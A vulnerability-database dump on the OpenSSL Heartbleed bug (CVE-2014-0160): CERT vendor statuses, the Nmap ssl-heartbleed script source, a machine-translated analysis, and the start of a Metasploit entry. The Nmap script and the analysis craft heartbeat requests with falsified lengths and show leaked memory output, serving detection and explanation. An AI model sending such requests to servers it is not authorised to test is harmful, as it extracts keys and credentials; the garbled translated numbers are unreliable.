\nSYMPTOMS \nNot applicable. \nWORKAROUND \nNo workaround is necessary. \nCORRECTIVE ACTION \nNot applicable.`\n\n### __ __ WSO2\n\nUpdated: April 15, 2014 \n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nOn April 7th, a Security Advisory was issued by the OpenSSL project notifying the public of a serious vulnerability in the encryption software used by a majority of websites on the Internet.\n\n[http://connect.wso2.com/wso2/c/secadv_20140407.txt?_lid=62396&_cid=77097&_t=859269](<http://connect.wso2.com/wso2/c/secadv_20140407.txt?_lid=62396&_cid=77097&_t=859269>) \n \nWe want you to know that our servers were not exposed and your WSO2 account is completely safe. Nevertheless, to ensure there is no additional risk, we strongly encourage you to request a new password. \n[http://connect.wso2.com/wso2/c/password?_lid=62397&_cid=77097&_t=859269](<http://connect.wso2.com/wso2/c/password?_lid=62397&_cid=77097&_t=859269>) \n \nIf you have any questions or concerns, please email security@wso2.com. \n \nFor additional information regarding this vulnerability, please visit: \n[http://connect.wso2.com/wso2/c/heartbleed.com?_lid=62398&_cid=77097&_t=859269](<http://connect.wso2.com/wso2/c/heartbleed.com?_lid=62398&_cid=77097&_t=859269>)\n\n### __ __ m0n0wall\n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nm0n0wall is not affected (as it uses OpenSSL 0.9.8).\n\n### __ ACCESS\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ AT&T\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Alcatel-Lucent\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Apple Inc.\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Avaya, Inc.\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Barracuda Networks\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Belkin, Inc.\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Charlotte's Web Networks\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Check Point Software Technologies\n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk100173](<https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk100173>)\n\n### __ Cray Inc.\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ D-Link Systems, Inc.\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ DragonFly BSD Project\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ EMC Corporation\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Engarde Secure Linux\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Enterasys Networks\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Ericsson\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Force10 Networks, Inc.\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Fujitsu\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ IBM Corporation (zseries)\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ IBM eServer\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Internet Security Systems, Inc.\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Intoto\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ MontaVista Software, Inc.\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ __ NEC Corporation\n\nNotified: April 08, 2014 Updated: April 30, 2014 \n\n**Statement Date: April 30, 2014**\n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nWe provide information on this issue at the following URL\n\n<http://jpn.nec.com/security-info/av14-001.html> (only in Japanese)\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://jpn.nec.com/security-info/av14-001.html>\n\n### __ Nokia\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Novell, Inc.\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Palo Alto Networks\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Process Software\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Q1 Labs\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ QNX Software Systems Inc.\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ SafeNet\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ SmoothWall\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Snort\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Sony Corporation\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Sourcefire\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Stonesoft\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ The SCO Group\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ TippingPoint Technologies Inc.\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Turbolinux\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Watchguard Technologies, Inc.\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ ZyXEL\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ eSoft, Inc.\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ netfilter\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\nView all 99 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 5.0 | AV:N/AC:L/Au:N/C:P/I:N/A:N \nTemporal | 4.1 | E:F/RL:OF/RC:C \nEnvironmental | 6.5 | CDP:LM/TD:H/CR:H/IR:H/AR:ND \n \n \n\n\n### References \n\n * <http://heartbleed.com/>\n * <http://seclists.org/oss-sec/2014/q2/22>\n * <http://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=96db902>\n * <https://tools.ietf.org/html/rfc6520>\n * <http://www.openssl.org/news/openssl-1.0.1-notes.html>\n * <http://www.hut3.net/blog/cns---networks-security/2014/04/14/bugs-in-heartbleed-detection-scripts->\n * <http://blog.cryptographyengineering.com/2014/04/attack-of-week-openssl-heartbleed.html>\n * <http://blog.fox-it.com/2014/04/08/openssl-heartbleed-bug-live-blog/>\n * <https://www.cert.fi/en/reports/2014/vulnerability788210.html>\n * <http://xkcd.com/1354/>\n * <https://code.google.com/p/mod-spdy/issues/detail?id=85>\n * <http://www.exploit-db.com/exploits/32745/>\n * <https://access.redhat.com/security/cve/CVE-2014-0160>\n * <http://www.ubuntu.com/usn/usn-2165-1/>\n * <http://www.freshports.org/security/openssl/>\n * <https://blog.torproject.org/blog/openssl-bug-cve-2014-0160>\n\n### Acknowledgements\n\nThis vulnerability was reported by OpenSSL, who in turn credits Riku, Antti and Matti at Codenomicon and Neel Mehta of Google Security.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2014-0160](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160>) \n---|--- \n**Date Public:** | 2014-04-07 \n**Date First Published:** | 2014-04-08 \n**Date Last Updated: ** | 2016-05-13 15:26 UTC \n**Document Revision: ** | 177 \n", "modified": "2016-05-13T15:26:00", "published": "2014-04-08T00:00:00", "id": "VU:720951", "href": "https://www.kb.cert.org/vuls/id/720951", "type": "cert", "title": "OpenSSL TLS heartbeat extension read overflow discloses sensitive information", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "nmap": [{"lastseen": "2019-05-30T17:05:58", "bulletinFamily": "scanner", "description": "Detects whether a server is vulnerable to the OpenSSL Heartbleed bug (CVE-2014-0160). The code is based on the Python script ssltest.py authored by Jared Stafford (jspenguin@jspenguin.org)\n\n## Script Arguments \n\n#### ssl-heartbleed.protocols \n\n(default tries all) TLS 1.0, TLS 1.1, or TLS 1.2\n\n#### tls.servername \n\nSee the documentation for the tls library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### mssql.domain, mssql.instance-all, mssql.instance-name, mssql.instance-port, mssql.password, mssql.protocol, mssql.scanned-ports-only, mssql.timeout, mssql.username \n\nSee the documentation for the mssql library. \n\n#### smtp.domain \n\nSee the documentation for the smtp library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the smb library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. \n\n## Example Usage \n \n \n nmap -p 443 --script ssl-heartbleed <target>\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 443/tcp open https\n | ssl-heartbleed:\n | VULNERABLE:\n | The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.\n | State: VULNERABLE\n | Risk factor: High\n | Description:\n | OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.\n |\n | References:\n | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160\n | http://www.openssl.org/news/secadv_20140407.txt\n |_ http://cvedetails.com/cve/2014-0160/\n \n \n\n## Requires \n\n * match\n * nmap\n * shortport\n * sslcert\n * stdnse\n * string\n * tableaux\n * vulns\n * tls\n\n* * *\n", "modified": "2018-11-06T15:07:01", "published": "2014-04-09T01:49:29", "id": "NMAP:SSL-HEARTBLEED.NSE", "href": "https://nmap.org/nsedoc/scripts/ssl-heartbleed.html", "title": "ssl-heartbleed NSE Script", "type": "nmap", "sourceData": "local match = require('match')\nlocal nmap = require('nmap')\nlocal shortport = require('shortport')\nlocal sslcert = require('sslcert')\nlocal stdnse = require('stdnse')\nlocal string = require \"string\"\nlocal tableaux = require \"tableaux\"\nlocal vulns = require('vulns')\nlocal have_tls, tls = pcall(require,'tls')\nassert(have_tls, \"This script requires the tls.lua library from https://nmap.org/nsedoc/lib/tls.html\")\n\ndescription = [[\nDetects whether a server is vulnerable to the OpenSSL Heartbleed bug (CVE-2014-0160).\nThe code is based on the Python script ssltest.py authored by Jared Stafford (jspenguin@jspenguin.org)\n]]\n\n---\n-- @usage\n-- nmap -p 443 --script ssl-heartbleed <target>\n--\n-- @output\n-- PORT STATE SERVICE\n-- 443/tcp open https\n-- | ssl-heartbleed:\n-- | VULNERABLE:\n-- | The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.\n-- | State: VULNERABLE\n-- | Risk factor: High\n-- | Description:\n-- | OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.\n-- |\n-- | References:\n-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160\n-- | http://www.openssl.org/news/secadv_20140407.txt\n-- |_ http://cvedetails.com/cve/2014-0160/\n--\n--\n-- @args ssl-heartbleed.protocols (default tries all) TLS 1.0, TLS 1.1, or TLS 1.2\n--\n\nauthor = \"Patrik Karlsson <patrik@cqure.net>\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = { \"vuln\", \"safe\" }\ndependencies = {\"https-redirect\"}\n\nlocal arg_protocols = stdnse.get_script_args(SCRIPT_NAME .. \".protocols\") or {'TLSv1.0', 'TLSv1.1', 'TLSv1.2'}\n\nportrule = function(host, port)\n return shortport.ssl(host, port) or sslcert.getPrepareTLSWithoutReconnect(port)\nend\n\nlocal function recvhdr(s)\n local status, hdr = s:receive_buf(match.numbytes(5), true)\n if not status then\n stdnse.debug3('Unexpected EOF receiving record header - server closed connection')\n return\n end\n local typ, ver, ln = string.unpack('>B I2 I2', hdr)\n return status, typ, ver, ln\nend\n\nlocal function recvmsg(s, len)\n local status, pay = s:receive_buf(match.numbytes(len), true)\n if not status then\n stdnse.debug3('Unexpected EOF receiving record payload - server closed connection')\n return\n end\n return true, pay\nend\n\nlocal function testversion(host, port, version)\n\n local hello = tls.client_hello({\n [\"protocol\"] = version,\n -- Claim to support every cipher\n -- Doesn't work with IIS, but IIS isn't vulnerable\n [\"ciphers\"] = tableaux.keys(tls.CIPHERS),\n [\"compressors\"] = {\"NULL\"},\n [\"extensions\"] = {\n -- Claim to support common elliptic curves\n [\"elliptic_curves\"] = tls.EXTENSION_HELPERS[\"elliptic_curves\"](tls.DEFAULT_ELLIPTIC_CURVES),\n [\"heartbeat\"] = \"\\x01\", -- peer_not_allowed_to_send\n },\n })\n\n local payload = \"Nmap ssl-heartbleed\"\n local hb = tls.record_write(\"heartbeat\", version, string.pack(\"B>I2\",\n 1, -- HeartbeatMessageType heartbeat_request\n 0x4000) -- payload length (falsified)\n -- payload length is based on 4096 - 16 bytes padding - 8 bytes packet\n -- header + 1 to overflow\n .. payload -- less than payload length.\n )\n\n local status, s, err\n local specialized = sslcert.getPrepareTLSWithoutReconnect(port)\n if specialized then\n status, s = specialized(host, port)\n if not status then\n stdnse.debug3(\"Connection to server failed: %s\", s)\n return\n end\n else\n s = nmap.new_socket()\n status, err = s:connect(host, port)\n if not status then\n stdnse.debug3(\"Connection to server failed: %s\", err)\n return\n end\n end\n\n s:set_timeout(5000)\n\n -- Send Client Hello to the target server\n status, err = s:send(hello)\n if not status then\n stdnse.debug1(\"Couldn't send Client Hello: %s\", err)\n s:close()\n return nil\n end\n\n -- Read response\n local done = false\n local supported = false\n local i = 1\n local response\n repeat\n status, response, err = tls.record_buffer(s, response, i)\n if err == \"TIMEOUT\" then\n -- Timed out while waiting for server_hello_done\n -- Could be client certificate required or other message required\n -- Let's just drop out and try sending the heartbeat anyway.\n done = true\n break\n elseif not status then\n stdnse.debug1(\"Couldn't receive: %s\", err)\n s:close()\n return nil\n end\n\n local record\n i, record = tls.record_read(response, i)\n if record == nil then\n stdnse.debug1(\"Unknown response from server\")\n s:close()\n return nil\n elseif record.protocol ~= version then\n stdnse.debug1(\"Protocol version mismatch\")\n s:close()\n return nil\n end\n\n if record.type == \"handshake\" then\n for _, body in ipairs(record.body) do\n if body.type == \"server_hello\" then\n if body.extensions and body.extensions[\"heartbeat\"] == \"\\x01\" then\n supported = true\n end\n elseif body.type == \"server_hello_done\" then\n stdnse.debug1(\"we're done!\")\n done = true\n end\n end\n end\n until done\n if not supported then\n stdnse.debug1(\"Server does not support TLS Heartbeat Requests.\")\n s:close()\n return nil\n end\n\n status, err = s:send(hb)\n if not status then\n stdnse.debug1(\"Couldn't send heartbeat request: %s\", err)\n s:close()\n return nil\n end\n while(true) do\n local status, typ, ver, len = recvhdr(s)\n if not status then\n stdnse.debug1('No heartbeat response received, server likely not vulnerable')\n break\n end\n if typ == 24 then\n local pay\n status, pay = recvmsg(s, 0x0fe9)\n s:close()\n if #pay > 3 then\n return true\n else\n stdnse.debug1('Server processed malformed heartbeat, but did not return any extra data.')\n break\n end\n elseif typ == 21 then\n stdnse.debug1('Server returned error, likely not vulnerable')\n break\n end\n end\n\nend\n\naction = function(host, port)\n local vuln_table = {\n title = \"The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.\",\n state = vulns.STATE.NOT_VULN,\n risk_factor = \"High\",\n description = [[\nOpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.\n ]],\n\n references = {\n 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160',\n 'http://www.openssl.org/news/secadv_20140407.txt ',\n 'http://cvedetails.com/cve/2014-0160/'\n }\n }\n\n local report = vulns.Report:new(SCRIPT_NAME, host, port)\n local test_vers = arg_protocols\n\n if type(test_vers) == 'string' then\n test_vers = { test_vers }\n end\n\n for _, ver in ipairs(test_vers) do\n if nil == tls.PROTOCOLS[ver] then\n return \"\\n Unsupported protocol version: \" .. ver\n end\n local status = testversion(host, port, ver)\n if ( status ) then\n vuln_table.state = vulns.STATE.VULN\n break\n end\n end\n\n return report:make_output(vuln_table)\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "myhack58": [{"lastseen": "2016-11-02T19:48:51", "bulletinFamily": "info", "description": "Author: yaoxi original source http://blog.wangzhan.360.cn/\n\nRecently, OpenSSL broke this year's most serious security vulnerability in the hacker community is named\u201cheart bleed\u201dvulnerability. 3 6 0 site Guard security team of the vulnerability analysis, the vulnerability is not only related to https at the beginning of the URL, but also includes indirect use of the OpenSSL code products and services, such as VPN, mail system, FTP tools and other products and services, and may even be related to some other security facilities of the source code.\n\nThe affected version\n\nOpenSSL1. 0. 1, The 1.0.1 a, 1.0.1 b, 1.0.1 c, 1.0.1 d, 1.0.1 e, 1.0.1 f, Beta 1 of OpenSSL 1.0.2 and other versions.\n\nVulnerability detail description: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160\n\nVulnerability description\n\nOpenSSL in the realization of the TLS and DTLS heartbeat processing logic, the presence of coding defects. OpenSSL's heartbeat processing logic does not detect a heartbeat packet in the length field and subsequent data fields are consistent, the attacker can take advantage of this, structural abnormalities of the data packet, to obtain the heartbeat data where the memory area of the subsequent data. These data may be contained in a certificate private key, user name, user password, user email and other sensitive information. The vulnerability allows an attacker read from memory up to 64KB of data.\n\nA few days ago of a vulnerability analysis of the articles the main focus in turn on HTTPS on the site, ordinary users may think that only the website their business will be affected by this vulnerability. From 3 6 0 websites guards Openssl effort loophole online testing platform(wangzhan. 3 6 0. cn/heartbleed)monitoring data that, effort to exploit the range of radiation has been from the open HTTPS site extends to the VPN system and the mail system, The current Total Domestic total 2 5 1 a VPN system and a 7 2 5 a mail system to the presence of the same vulnerability, including many government websites, key universities and related security vendors.\n\nIn order to better allow everyone to understand that the Openssl effort loophole in the end is which aspects of a problem, we use the OpenSSL lib library to write a does not depend on any business separate server program, a step-by-step the actual debug over the code, in order to prove that not only is the https site has a problem, as long as the use of the existence of the vulnerability in the OpenSSL libssl. so the gallery app there are security vulnerabilities that!\n\nThe test environment\n\nOS: CentOS release 6.4 (Final)\n\nOpenSSL: Version 1.0.1 f Do not open the OPENSSL_NO_HEARTBEATS compile options\n\nWrite a Server program: monitor port 9 8 7 6\n\nVulnerability testing\n\nUse the online python validation script https://gist.github.com/RixTox/10222402 test\n\nStructural abnormalities of the heartbeat data packet, mainly to add the exception of the length field value.\n\nTest one:\n\nHeartBeat Requst packet\n\nhb = h2bin(\u201d\u2019\n\n1 8 0 3 0 2 0 0 0 3\n\n0 1 2 0 0 0\n\n\u201d\u2019)\n\nBlue 0 1 represents the heartbeat packet of type request direction. The corresponding source code is #define TLS1_HB_REQUEST 1\n\nRed 2 0 0 0 indicates that the heartbeat request packet length field, accounting for two bytes, corresponding to the length value of 8 1 of 9 2 of.\n\nThe HeartBeat Response packet\n\n[root@server test]# python ssltest.py 127.0.0.1-p 9 8 7 6 > 1\n\nSending heartbeat request...\n\n... received message: type = 2 4, ver = 0 3 0 2, length = 8 2 1 1\n\nReceived heartbeat response:\n\nWARNING: server returned more data than it should \u2013 server is vulnerable!\n\nReceived heartbeat response:\n\n0 0 0 0: 0 2 2 0 0 0 D8 0 3 0 2 5 3 4 3 5B 9 0 9D 9B 7 2 0B BC 0C. .... SC[...r...\n\n0 0 1 0: BC 2B 9 2 A8 4 8 9 7 CF BD 3 9 0 4 CC 1 6 0A 8 5 0 3 9 0 .+.. H...9.......\n\n0 0 2 0: 9F 7 7 0 4 3 3 D4 DE 0 0 0 0 6 6 C0 1 4 C0 0A C0 2 2 C0 . w. 3.... f.....\".\n\n0 0 3 0: 2 1 0 0 3 9 0 0 3 8 0 0 8 8 0 0 8 7 C0 0F C0 0 5 0 0 3 5 0 0 !. 9. 8......... 5.\n\nBlue 0 2 represents the heartbeat packet type response direction.\n\nThe corresponding source code is #define TLS1_HB_RESPONSE 2\n\nRed 2 0 0 0 represented by the heartbeat response packet length field, accounting for two bytes, corresponding to the length value of 8 1 of 9 2 of. And the request packet length value.\n\nThe green part is the illegal access to cross-border data(which may include Username, Password, e-mail, internal network IP and other sensitive information).\n\nTest two:\n\nIn the test on the basis of one, modify the request heartbeat packets, the length field's value from 2 to 0 0 0 to 3 0 0 0\n\nHeartBeat Requst packet\n\nhb = h2bin(\"'\n\n1 8 0 3 0 2 0 0 0 3\n\n0 1 3 0 0 0\n\n\"')\n\n3 0 0 0 two bytes corresponding to the length 1 2 2 8 8 out of 8 1 9 2+4 0 9 6\uff09\n\nThe HeartBeat Response packet\n\n[root@server test]# python ssltest.py 127.0.0.1-p 9 8 7 6 > 1\n\nSending heartbeat request...\n\n... received message: type = 2 4, ver = 0 3 0 2, length = 1 2 3 0 7\n\nReceived heartbeat response:\n\nWARNING: server returned more data than it should \u2013 server is vulnerable!\n\nReceived heartbeat response:\n\n0 0 0 0: 0 2 3 0 0 0 D8 0 3 0 2 5 3 4 3 5B 9 0 9D 9B 7 2 0B BC 0C .0.... SC[...r...\n\n0 0 1 0: BC 2B 9 2 A8 4 8 9 7 CF BD 3 9 0 4 CC 1 6 0A 8 5 0 3 9 0 .+.. H...9.......\n\n0 0 2 0: 9F 7 7 0 4 3 3 D4 DE 0 0 0 0 6 6 C0 1 4 C0 0A C0 2 2 C0 . w. 3.... f.....\".\n\n0 0 3 0: 2 1 0 0 3 9 0 0 3 8 0 0 8 8 0 0 8 7 C0 0F C0 0 5 0 0 3 5 0 0 !. 9. 8......... 5.\n\nTwo test cases, the response of the length of the length value is always greater than the request length of the multi-out 1 9 a byte, why?\n\nBecause, TLS and DTLS in dealing with the type of TLS1_HB_REQUEST the heartbeat request packet logic, from the heap space on the application memory size, there are 4 part of the decision type+length+request data length+pad, where type,length,pad the field into account for 1byte and 2byte, the 16byte, so the response data is always better than the request of many out 19byte it.\n\nSource code analysis\n\nOutline\n\nThe vulnerability is mainly a memory leak problem, and the fundamental is because OpenSSL in the handling heartbeat request packet, not to the length field for 2byte, you can identify the data length is 64KB and the subsequent data fields do compliance testing. Generate a heartbeat response packet, the direct use of a length corresponding to the length from heap space application memory, not only is the real request data is much smaller than the length identified in length.\n\nRelated to parsing the source code description\n\nThe vulnerability exists in the source file there are two ssl/d1_both. c and ssl/t1_lib. c.\n\nHeartbeat processing logic, respectively, is dtls1_process_heartbeat and tls1_process_heartbeat two functions.\n\ndtls1_process_heartbeat function processing logic:\n\nStep1. Get heartbeat request packet corresponding to the SSLv3 record the data in the pointer field pointing to the request of the requested data portion.\n\nunsigned char *p = &s->s3->rrec. data[0];\n\nrecord the data format should contain three fields: type, length, data; respectively accounted for 1byte and 2byte, the length of the actual value.\n\n**[1] [[2]](<44409_2.htm>) [next](<44409_2.htm>)**\n", "modified": "2014-04-10T00:00:00", "published": "2014-04-10T00:00:00", "id": "MYHACK58:62201444409", "href": "http://www.myhack58.com/Article/html/3/62/2014/44409.htm", "type": "myhack58", "title": "Than imagined more terror! OpenSSL\u201ceffort\u201dvulnerability in-depth analysis-vulnerability warning-the black bar safety net", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "metasploit": [{"lastseen": "2020-01-13T05:16:55", "bulletinFamily": "exploit", "description": "This module implements the OpenSSL Heartbleed attack. The problem exists in the handling of heartbeat 